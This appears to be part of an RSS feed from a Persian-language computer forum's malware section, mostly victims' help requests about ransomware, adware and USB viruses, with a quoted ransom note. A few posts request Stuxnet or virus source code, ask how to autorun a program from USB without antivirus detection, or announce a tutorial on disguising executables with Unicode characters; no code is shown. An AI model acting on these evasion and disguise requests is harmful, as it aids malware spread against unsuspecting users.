			<description><![CDATA[دوستان سلام <br />
<br />
چند روزه سیستم یه ویروس یا تروجان خطرناک آلوده شده <br />
<br />
طریق کار هم به این صورته که بر روی فابل تصاویر - ویدئو - نرم افزار و دایکیومنت کدگذاری انجام میده<br />
و فایلها با این پسوند  enc0ded!JSO2918124 نمایش داده میشن<br />
<br />
در ضمن یه فایل تکست هم در تمام فولدرها اجاد میکنه که درونش نوشتهای با این مضمون هست:<br />
<br />
Hi, your ID = JSO2918124<br />
<br />
All important files were encoded with RSA-1024 encryption algorithm.<br />
There is the only way to restore them - purchase the unique unlock code.<br />
<br />
Warning! Any attempt to recovering files without our "Special program" will cause data damage or complete data loss.<br />
As we receive your payment, we will send special program and your unique code to unlock your system.<br />
<br />
Guarantee: You can send one of the encrypted file by email and we decode it for free as proof of our abilities.<br />
<br />
No sense to contact the police. Your payment must be made to the e-wallet. It's impossible to trace. <br />
Don`t waste your and our time.<br />
<br />
So, if you are ready to pay for recovering your files, please reply this email ChiuKhan@tom.com<br />
<br />
Then we will send payment instructions. <br />
<br />
 من ویندوز رو هم پاک کرد منتهی درست نشد<br />
<br />
دوستان در صورتی که آشنایی با این ویروس دارند و یا راه حلی براش دارند <br />
<br />
اعلام کنند<br />
<br />
یک نمونه از عکس رو که رمز نگاری شده رو پیوست میکنم<br /><!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/zip.gif" title="" border="0" alt=".rar" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=12926" target="_blank">3.jpg.rar</a> (اندازه:  969.62 KB / تعداد دفعات دریافت:  111)
<!-- end: postbit_attachments_attachment -->]]></description>
			<content:encoded><![CDATA[دوستان سلام <br />
<br />
چند روزه سیستم یه ویروس یا تروجان خطرناک آلوده شده <br />
<br />
طریق کار هم به این صورته که بر روی فابل تصاویر - ویدئو - نرم افزار و دایکیومنت کدگذاری انجام میده<br />
و فایلها با این پسوند  enc0ded!JSO2918124 نمایش داده میشن<br />
<br />
در ضمن یه فایل تکست هم در تمام فولدرها اجاد میکنه که درونش نوشتهای با این مضمون هست:<br />
<br />
Hi, your ID = JSO2918124<br />
<br />
All important files were encoded with RSA-1024 encryption algorithm.<br />
There is the only way to restore them - purchase the unique unlock code.<br />
<br />
Warning! Any attempt to recovering files without our "Special program" will cause data damage or complete data loss.<br />
As we receive your payment, we will send special program and your unique code to unlock your system.<br />
<br />
Guarantee: You can send one of the encrypted file by email and we decode it for free as proof of our abilities.<br />
<br />
No sense to contact the police. Your payment must be made to the e-wallet. It's impossible to trace. <br />
Don`t waste your and our time.<br />
<br />
So, if you are ready to pay for recovering your files, please reply this email ChiuKhan@tom.com<br />
<br />
Then we will send payment instructions. <br />
<br />
 من ویندوز رو هم پاک کرد منتهی درست نشد<br />
<br />
دوستان در صورتی که آشنایی با این ویروس دارند و یا راه حلی براش دارند <br />
<br />
اعلام کنند<br />
<br />
یک نمونه از عکس رو که رمز نگاری شده رو پیوست میکنم<br /><!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/zip.gif" title="" border="0" alt=".rar" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=12926" target="_blank">3.jpg.rar</a> (اندازه:  969.62 KB / تعداد دفعات دریافت:  111)
<!-- end: postbit_attachments_attachment -->]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[سوال - جلو گیری از pop-up]]></title>
			<link>https://www.iranled.com/forum/thread-29451.html</link>
			<pubDate>Tue, 30 Dec 2014 19:00:49 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-29451.html</guid>
			<description><![CDATA[با سلام خدمت دوستان<br />
برای دانلود یک پلاگین مجبور شدم فایل دانلودر آنرا دانلود و اجرا کنم از آن<br />
موقع با هر بروزر و هر صفحه را که باز میکنم 3 پنجره در پائین و یک پنجره<br />
به صورت عمودی باز می شود.هر ترفندی بلد بودم نتیجه نداده.<br />
لطفا" راهنمائی کنید<br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/image.gif" title="JPEG Image" border="0" alt=".jpg" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=12901" target="_blank">popup1.JPG</a> (اندازه:  75.54 KB / تعداد دفعات دریافت:  91)
<!-- end: postbit_attachments_attachment -->]]></description>
			<content:encoded><![CDATA[با سلام خدمت دوستان<br />
برای دانلود یک پلاگین مجبور شدم فایل دانلودر آنرا دانلود و اجرا کنم از آن<br />
موقع با هر بروزر و هر صفحه را که باز میکنم 3 پنجره در پائین و یک پنجره<br />
به صورت عمودی باز می شود.هر ترفندی بلد بودم نتیجه نداده.<br />
لطفا" راهنمائی کنید<br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/image.gif" title="JPEG Image" border="0" alt=".jpg" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=12901" target="_blank">popup1.JPG</a> (اندازه:  75.54 KB / تعداد دفعات دریافت:  91)
<!-- end: postbit_attachments_attachment -->]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[حذف ویروس های TMP!]]></title>
			<link>https://www.iranled.com/forum/thread-29034.html</link>
			<pubDate>Thu, 16 Oct 2014 14:46:20 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-29034.html</guid>
			<description><![CDATA[<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/image.gif" title="" border="0" alt=".bmp" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=12591" target="_blank">11.bmp</a> (اندازه:  622.93 KB / تعداد دفعات دریافت:  116)
<!-- end: postbit_attachments_attachment --><!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/image.gif" title="" border="0" alt=".bmp" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=12592" target="_blank">12.bmp</a> (اندازه:  627.92 KB / تعداد دفعات دریافت:  107)
<!-- end: postbit_attachments_attachment -->با سلام<br />
<br />
حقیقت ی مشکل پیش اومده نمیدونم مشکل از کجاس ولی بیشتر مثل ی ویروس میمونه(من بهش میگم میکروب)!<br />
یادمه چند مدت پیش همین اتفاق واسم پیش اومد و با دردسر رفعش کردم ولی الان نمیدونم چکار کنم،یعنی ی مقدار عجله ای هست؛ممنون میشم کمک کنید،<br />
<br />
ماجرا از این قراره،ک تو task-m ی پروسه ای آپ میشه اونم ن ی یکی ن دوتا، بعضی مواقع ب حدود بیستا هم میرسه...<br />
تو سربرگ processes با عنوان hrlXXX.tmp  بالا میاد تو عکسا قرار دادم.<br />
End task  میکنم ولی چند لحظه بعد باز میاد بالا،<br />
حتی از تو مسیر windows/temp فایل های ایجاد شده رو دلیت میکنم ولی باز ....<br />
<br />
<br />
ممنون]]></description>
			<content:encoded><![CDATA[<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/image.gif" title="" border="0" alt=".bmp" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=12591" target="_blank">11.bmp</a> (اندازه:  622.93 KB / تعداد دفعات دریافت:  116)
<!-- end: postbit_attachments_attachment --><!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/image.gif" title="" border="0" alt=".bmp" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=12592" target="_blank">12.bmp</a> (اندازه:  627.92 KB / تعداد دفعات دریافت:  107)
<!-- end: postbit_attachments_attachment -->با سلام<br />
<br />
حقیقت ی مشکل پیش اومده نمیدونم مشکل از کجاس ولی بیشتر مثل ی ویروس میمونه(من بهش میگم میکروب)!<br />
یادمه چند مدت پیش همین اتفاق واسم پیش اومد و با دردسر رفعش کردم ولی الان نمیدونم چکار کنم،یعنی ی مقدار عجله ای هست؛ممنون میشم کمک کنید،<br />
<br />
ماجرا از این قراره،ک تو task-m ی پروسه ای آپ میشه اونم ن ی یکی ن دوتا، بعضی مواقع ب حدود بیستا هم میرسه...<br />
تو سربرگ processes با عنوان hrlXXX.tmp  بالا میاد تو عکسا قرار دادم.<br />
End task  میکنم ولی چند لحظه بعد باز میاد بالا،<br />
حتی از تو مسیر windows/temp فایل های ایجاد شده رو دلیت میکنم ولی باز ....<br />
<br />
<br />
ممنون]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[درخواست سورس ویروس سخت افزاری]]></title>
			<link>https://www.iranled.com/forum/thread-28356.html</link>
			<pubDate>Fri, 06 Jun 2014 09:14:09 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-28356.html</guid>
			<description><![CDATA[سلام میشه لطفا کسی سورس ویروس استاکس نت یا Flame یا هر ویروس سخت افزاری قرار بده ممنون<br />
<br />
<img src="https://www.iranled.com/forum/images/smilies2/heart.gif" alt="Heart" title="Heart" class="smilie smilie_15" />]]></description>
			<content:encoded><![CDATA[سلام میشه لطفا کسی سورس ویروس استاکس نت یا Flame یا هر ویروس سخت افزاری قرار بده ممنون<br />
<br />
<img src="https://www.iranled.com/forum/images/smilies2/heart.gif" alt="Heart" title="Heart" class="smilie smilie_15" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[ويروس RECYCLER]]></title>
			<link>https://www.iranled.com/forum/thread-28342.html</link>
			<pubDate>Tue, 03 Jun 2014 13:53:41 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-28342.html</guid>
			<description><![CDATA[باسلام <br />
سيستم من ويروس RECYCLER گرفته تو هر درايوي كه ميرم يه RECYCLER هست باچه آنتي ويروسي و ور‍‍‍‍‍ژن چند مي تونم اين ويروس رو ازبين ببرم.<br />
باتشكر]]></description>
			<content:encoded><![CDATA[باسلام <br />
سيستم من ويروس RECYCLER گرفته تو هر درايوي كه ميرم يه RECYCLER هست باچه آنتي ويروسي و ور‍‍‍‍‍ژن چند مي تونم اين ويروس رو ازبين ببرم.<br />
باتشكر]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[آنالیز فایل های مخرب با malware_analyser 3.3]]></title>
			<link>https://www.iranled.com/forum/thread-28242.html</link>
			<pubDate>Wed, 14 May 2014 09:44:07 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-28242.html</guid>
			<description><![CDATA[[*] - آنالیز فایل های اجرایی (Exe) و کتابخانه ها (DLL)<br />
<br />
[*] - آنالیز چند فایل (فایل های یک پوشه)<br />
<br />
[*] - Dump گرفتن از Procress<br />
<br />
[*] - آنالیز Dynamic <br />
<br />
[*] - ایجاد و گرفتن امضا دیجیتالی از یک فایل (ذخیره در دیتابیس)<br />
<br />
[*] - نمایش PE  Headers<br />
<br />
[*] - نمایش String ها<br />
<br />
[*] - آنالیز آنلاین توسط  سایت Virus Total<br />
<br />
<img src="http://gowebdev.ir/upimg/malware_analyser.png" alt="[تصویر:  malware_analyser.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<a href="http://gowebdev.ir/view.php?pid=24" target="_blank" rel="noopener" class="mycode_url">Download | دانلود</a>]]></description>
			<content:encoded><![CDATA[[*] - آنالیز فایل های اجرایی (Exe) و کتابخانه ها (DLL)<br />
<br />
[*] - آنالیز چند فایل (فایل های یک پوشه)<br />
<br />
[*] - Dump گرفتن از Procress<br />
<br />
[*] - آنالیز Dynamic <br />
<br />
[*] - ایجاد و گرفتن امضا دیجیتالی از یک فایل (ذخیره در دیتابیس)<br />
<br />
[*] - نمایش PE  Headers<br />
<br />
[*] - نمایش String ها<br />
<br />
[*] - آنالیز آنلاین توسط  سایت Virus Total<br />
<br />
<img src="http://gowebdev.ir/upimg/malware_analyser.png" alt="[تصویر:  malware_analyser.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<a href="http://gowebdev.ir/view.php?pid=24" target="_blank" rel="noopener" class="mycode_url">Download | دانلود</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[یه ویروس exe]]></title>
			<link>https://www.iranled.com/forum/thread-27956.html</link>
			<pubDate>Thu, 20 Mar 2014 15:43:51 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-27956.html</guid>
			<description><![CDATA[سلام دوستان <br />
یه چند وقتیه که تو مموریم یه ویروسی هست که تو همه پوشه ها این دوتا هست :<br />
new folder.exe<br />
regsvr.exe<br />
وپاکشون که میکنی دوباره ظاهر میشن.<br />
جون ما کمک <br />
آنتی ویروسم ندارم<img src="https://www.iranled.com/forum/images/smilies2/sad.gif" alt="Sad" title="Sad" class="smilie smilie_6" />]]></description>
			<content:encoded><![CDATA[سلام دوستان <br />
یه چند وقتیه که تو مموریم یه ویروسی هست که تو همه پوشه ها این دوتا هست :<br />
new folder.exe<br />
regsvr.exe<br />
وپاکشون که میکنی دوباره ظاهر میشن.<br />
جون ما کمک <br />
آنتی ویروسم ندارم<img src="https://www.iranled.com/forum/images/smilies2/sad.gif" alt="Sad" title="Sad" class="smilie smilie_6" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[آموزش تغییر نام فایل های exe جهت گمراهی بااستفاده از کاراکتر یونیکد]]></title>
			<link>https://www.iranled.com/forum/thread-27817.html</link>
			<pubDate>Mon, 17 Feb 2014 18:54:12 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-27817.html</guid>
			<description><![CDATA[<span style="font-size: large;" class="mycode_size"><div style="text-align: center;" class="mycode_align">به نام یگانه برنامه نویس عالم</div>
</span><br />
با سلام خدمت دوستان<img src="https://www.iranled.com/forum/images/smilies2/biggrin.gif" alt="Biggrin" title="Biggrin" class="smilie smilie_3" /><br />
امروز می خواهم یک آموزش جالب درباره عوض کرن فرمت فایل های exe بدم!<img src="https://www.iranled.com/forum/images/smilies2/my.gif" alt="Amaze" title="Amaze" class="smilie smilie_5" /><br />
شاید به خودتون مگه میشه؟<br />
- بله میشه!<img src="https://www.iranled.com/forum/images/smilies2/confused.gif" alt="Confused" title="Confused" class="smilie smilie_18" /><br />
چطور؟<br />
- اینطور<br />
در این ویدعو آموزشی به طور کامل توضیح داده شده است.<img src="https://www.iranled.com/forum/images/smilies/pack1/041.gif" alt="041" title="041" class="smilie smilie_63" /><br />
ببخشید از کیفیت ویدعو cpuم پایینه!<img src="https://www.iranled.com/forum/images/smilies/pack1/033.gif" alt="033" title="033" class="smilie smilie_55" /><br />
رمز:<span style="color: #FF0000;" class="mycode_color">iranled.com</span> <br />
نظرو تشکر فراموش نشود!<img src="https://www.iranled.com/forum/images/smilies2/smile.gif" alt="Smile" title="Smile" class="smilie smilie_11" /><br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/zip.gif" title="" border="0" alt=".rar" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=11088" target="_blank">Full Tools.rar</a> (اندازه:  2.2 MB / تعداد دفعات دریافت:  143)
<!-- end: postbit_attachments_attachment -->]]></description>
			<content:encoded><![CDATA[<span style="font-size: large;" class="mycode_size"><div style="text-align: center;" class="mycode_align">به نام یگانه برنامه نویس عالم</div>
</span><br />
با سلام خدمت دوستان<img src="https://www.iranled.com/forum/images/smilies2/biggrin.gif" alt="Biggrin" title="Biggrin" class="smilie smilie_3" /><br />
امروز می خواهم یک آموزش جالب درباره عوض کرن فرمت فایل های exe بدم!<img src="https://www.iranled.com/forum/images/smilies2/my.gif" alt="Amaze" title="Amaze" class="smilie smilie_5" /><br />
شاید به خودتون مگه میشه؟<br />
- بله میشه!<img src="https://www.iranled.com/forum/images/smilies2/confused.gif" alt="Confused" title="Confused" class="smilie smilie_18" /><br />
چطور؟<br />
- اینطور<br />
در این ویدعو آموزشی به طور کامل توضیح داده شده است.<img src="https://www.iranled.com/forum/images/smilies/pack1/041.gif" alt="041" title="041" class="smilie smilie_63" /><br />
ببخشید از کیفیت ویدعو cpuم پایینه!<img src="https://www.iranled.com/forum/images/smilies/pack1/033.gif" alt="033" title="033" class="smilie smilie_55" /><br />
رمز:<span style="color: #FF0000;" class="mycode_color">iranled.com</span> <br />
نظرو تشکر فراموش نشود!<img src="https://www.iranled.com/forum/images/smilies2/smile.gif" alt="Smile" title="Smile" class="smilie smilie_11" /><br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/zip.gif" title="" border="0" alt=".rar" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=11088" target="_blank">Full Tools.rar</a> (اندازه:  2.2 MB / تعداد دفعات دریافت:  143)
<!-- end: postbit_attachments_attachment -->]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[ویروس HowDecrypt]]></title>
			<link>https://www.iranled.com/forum/thread-27557.html</link>
			<pubDate>Mon, 30 Dec 2013 10:01:42 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-27557.html</guid>
			<description><![CDATA[با سلام به همه و کمک از دوستان<br />
1-ویروسی با ظاهر HowDecrypt  که دسترسی به تمام فایلها رو قفل کرده و درخواست 500یا50 دلار کرده(یک فایل TXT  یک فایل JPG  توی تمامی پوشه و درایوها گذاشته بود و توی اون گفته که فایلهای اینکریپت شده و برای باز کردن باید مبلغ را به آدرس فلان بپردازی)<br />
2-با برگردوندن(RESTORE) به چند روز قبل درایورها که خراب شده بود درست شد و لی فایلها همچنان غیر قابل دسترس است.<br />
3-با نصب و آپدیت مجدد NOD32 و یه برنامه دیگه به نام  YAC ظرهرا" اثری از این ویروس نیست ولی هنوز نتوانستم فایلهام رو باز کنم(ظراهر فایلها هم تغییری نکره ، نه پسوندش و نه حجمش )<br />
4-با برنامه Te94Decrypt.exe  و توی run با دستور 85 Te94Decrypt.exe -k<br />
برای دیکریپت کردن فایلها(که احتمال میدم اینکریپت شده) هیچ فایل اینکریپت شده ای هم در ظاهر یافت نشده.<br />
لطفا اگه کسی راهی میشناسه ، کمکم کنه فایل ها رو باز کنم.<br /><!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/image.gif" title="JPEG Image" border="0" alt=".jpg" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=10766" target="_blank">Capture.JPG</a> (اندازه:  25.07 KB / تعداد دفعات دریافت:  110)
<!-- end: postbit_attachments_attachment -->]]></description>
			<content:encoded><![CDATA[با سلام به همه و کمک از دوستان<br />
1-ویروسی با ظاهر HowDecrypt  که دسترسی به تمام فایلها رو قفل کرده و درخواست 500یا50 دلار کرده(یک فایل TXT  یک فایل JPG  توی تمامی پوشه و درایوها گذاشته بود و توی اون گفته که فایلهای اینکریپت شده و برای باز کردن باید مبلغ را به آدرس فلان بپردازی)<br />
2-با برگردوندن(RESTORE) به چند روز قبل درایورها که خراب شده بود درست شد و لی فایلها همچنان غیر قابل دسترس است.<br />
3-با نصب و آپدیت مجدد NOD32 و یه برنامه دیگه به نام  YAC ظرهرا" اثری از این ویروس نیست ولی هنوز نتوانستم فایلهام رو باز کنم(ظراهر فایلها هم تغییری نکره ، نه پسوندش و نه حجمش )<br />
4-با برنامه Te94Decrypt.exe  و توی run با دستور 85 Te94Decrypt.exe -k<br />
برای دیکریپت کردن فایلها(که احتمال میدم اینکریپت شده) هیچ فایل اینکریپت شده ای هم در ظاهر یافت نشده.<br />
لطفا اگه کسی راهی میشناسه ، کمکم کنه فایل ها رو باز کنم.<br /><!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.iranled.com/forum/images/attachtypes/image.gif" title="JPEG Image" border="0" alt=".jpg" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="https://www.iranled.com/forum/attachment.php?aid=10766" target="_blank">Capture.JPG</a> (اندازه:  25.07 KB / تعداد دفعات دریافت:  110)
<!-- end: postbit_attachments_attachment -->]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[اتو ران برنامه در فلش بدون شناسایی]]></title>
			<link>https://www.iranled.com/forum/thread-27441.html</link>
			<pubDate>Tue, 10 Dec 2013 16:28:34 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-27441.html</guid>
			<description><![CDATA[سلام دوستان<img src="https://www.iranled.com/forum/images/smilies2/heart.gif" alt="Heart" title="Heart" class="smilie smilie_15" /><br />
من می خواستم بدونم چطور می تونم برنامه ای رو که ساختم اتوران کنم به طوری که زمانی فلش به کامپیوتر وصل می شود اجرا شود بدون شناسایی شدن توسط آنتی ویروس<br />
از فایل Autorun.inf استفاده کردم ولی آنتی بهش گیر می ده!چکار کنم؟<br />
یک راهنمایی کوچیک بکنید،لطفا<br />
امر خیره<img src="https://www.iranled.com/forum/images/smilies2/shy.gif" alt="Shy" title="Shy" class="smilie smilie_4" />ویروس نیست<br />
ممننــــــــــــــــــ<img src="https://www.iranled.com/forum/images/smilies2/heart.gif" alt="Heart" title="Heart" class="smilie smilie_15" />ـــــــــــــــــون]]></description>
			<content:encoded><![CDATA[سلام دوستان<img src="https://www.iranled.com/forum/images/smilies2/heart.gif" alt="Heart" title="Heart" class="smilie smilie_15" /><br />
من می خواستم بدونم چطور می تونم برنامه ای رو که ساختم اتوران کنم به طوری که زمانی فلش به کامپیوتر وصل می شود اجرا شود بدون شناسایی شدن توسط آنتی ویروس<br />
از فایل Autorun.inf استفاده کردم ولی آنتی بهش گیر می ده!چکار کنم؟<br />
یک راهنمایی کوچیک بکنید،لطفا<br />
امر خیره<img src="https://www.iranled.com/forum/images/smilies2/shy.gif" alt="Shy" title="Shy" class="smilie smilie_4" />ویروس نیست<br />
ممننــــــــــــــــــ<img src="https://www.iranled.com/forum/images/smilies2/heart.gif" alt="Heart" title="Heart" class="smilie smilie_15" />ـــــــــــــــــون]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[ساخت ویروس بانوت پد]]></title>
			<link>https://www.iranled.com/forum/thread-27402.html</link>
			<pubDate>Wed, 04 Dec 2013 11:44:37 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-27402.html</guid>
			<description><![CDATA[من کاربرجدیدوتازه کارهستم اگه کسی ازویروس نویسی بانوت پد چیزی میدونه یا سورس ویروس داره ازمادریغ نکنه!<img src="https://www.iranled.com/forum/images/smilies1/exclamation.gif" alt="Exclamation" title="Exclamation" class="smilie smilie_7" />]]></description>
			<content:encoded><![CDATA[من کاربرجدیدوتازه کارهستم اگه کسی ازویروس نویسی بانوت پد چیزی میدونه یا سورس ویروس داره ازمادریغ نکنه!<img src="https://www.iranled.com/forum/images/smilies1/exclamation.gif" alt="Exclamation" title="Exclamation" class="smilie smilie_7" />]]></content:encoded>
		</item>
	</channel>
</rss>